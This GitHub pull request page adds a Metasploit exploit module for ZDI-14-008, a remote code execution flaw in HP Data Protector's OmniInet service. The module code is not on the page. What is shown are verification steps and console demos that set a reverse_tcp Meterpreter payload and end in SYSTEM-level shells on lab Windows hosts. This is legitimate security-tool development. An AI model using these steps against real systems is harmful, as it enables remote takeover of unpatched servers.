Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for ZDI-14-008 #3066

Merged
merged 1 commit into from Mar 5, 2014
Merged

Add module for ZDI-14-008 #3066

merged 1 commit into from Mar 5, 2014

Conversation

jvazquez-r7
Copy link
Contributor

We added ZDI-14-003 (#2891) but after reading http://ddilabs.blogspot.com.es/2014/02/fun-with-hp-data-protector-execbar.html, ZDI-14-003 is indeed a more powerful case. This module allows exploitation on Win 2003 SP2 and windows 2008 R2. With both cmd stager or powershell methods. Written in the plane, hope there is nothing weird! :) If there is something to update/improve just comment and will update when possible!

Tested successfully on HP Data Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2

Verification

  • Install WIN 2003 SP2 or Windows 2008 R2
  • Install HP Data Protector version HP Data Protector A.06.20, internal build 370, or any other vulnerable version (6.xx < 6.21 patched according to the advisory). Ask me for installer if you can't figure it how to download from the HP Page. Had the installer archived. Not sure if it's available anymore on the HP site.
  • Be sure which the vulnerable OmniInet.exe service is running on the port TCP 5555
  • Run the module like in the demo, hopefully enjoy sessions

Demo

  • check
msf exploit(hp_dataprotector_exec_bar) > set rhost 192.68.172.133
rhost => 192.68.172.133
msf exploit(hp_dataprotector_exec_bar) > check

[*] 192.168.172.133:5555 - HP Data Protector version HP Data Protector A.06.20: INET, internal build 370, built on Friday, February 25, 2011, 11:41 AM
[*] 192.168.172.133:5555 - The target appears to be vulnerable.
  • powershell method
msf exploit(hp_dataprotector_exec_bar) > set target 1
target => 1
msf exploit(hp_dataprotector_exec_bar) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(hp_dataprotector_exec_bar) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(hp_dataprotector_exec_bar) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.133:5555 - Exploiting through Powershell...
[*] Sending stage (769024 bytes) to 192.168.172.133
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.133:49375) at 2014-03-05 02:57:00 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-WT2AFYJYZEV
OS              : Windows 2008 (Build 6002, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
emeterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.133 - Meterpreter session 4 closed.  Reason: User exit
  • cmdstager method
msf exploit(hp_dataprotector_exec_bar) > set target 0
target => 0
msf exploit(hp_dataprotector_exec_bar) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Command Stager progress -   7.30% done (7499/102738 bytes)
[*] Command Stager progress -  14.60% done (14998/102738 bytes)
[*] Command Stager progress -  21.90% done (22497/102738 bytes)
[*] Command Stager progress -  29.20% done (29996/102738 bytes)
[*] Command Stager progress -  36.50% done (37495/102738 bytes)
[*] Command Stager progress -  43.79% done (44994/102738 bytes)
[*] Command Stager progress -  51.09% done (52493/102738 bytes)
[*] Command Stager progress -  58.39% done (59992/102738 bytes)
[*] Command Stager progress -  65.69% done (67491/102738 bytes)
[*] Command Stager progress -  72.99% done (74990/102738 bytes)
[*] Command Stager progress -  80.29% done (82489/102738 bytes)
[*] Command Stager progress -  87.59% done (89988/102738 bytes)
[*] Command Stager progress -  94.89% done (97487/102738 bytes)
[*] Sending stage (769024 bytes) to 192.168.172.133
[*] Command Stager progress - 100.00% done (102738/102738 bytes)
[*] Meterpreter session 5 opened (192.168.172.1:4444 -> 192.168.172.133:49376) at 2014-03-05 02:59:47 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
smeterpreter > sysinfo
Computer        : WIN-WT2AFYJYZEV
OS              : Windows 2008 (Build 6002, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.133 - Meterpreter session 5 closed.  Reason: User exit

@wchen-r7 wchen-r7 self-assigned this Mar 5, 2014
@Meatballs1
Copy link
Contributor

I knew you would convert to the Powershell-side one day, young padawan.

wchen-r7 added a commit that referenced this pull request Mar 5, 2014
@wchen-r7
Land #3066 - HP Data Protector Backup Client Service Remote Code Exec…
2015c56 
…ution
@wchen-r7 wchen-r7 merged commit 4e9350a into rapid7:master Mar 5, 2014
@bcoles bcoles mentioned this pull request Mar 6, 2014
Merged
@jvazquez-r7 jvazquez-r7 deleted the zdi_14_008 branch November 18, 2014 15:59
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wchen-r7 wchen-r7

Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@jvazquez-r7 @Meatballs1 @wchen-r7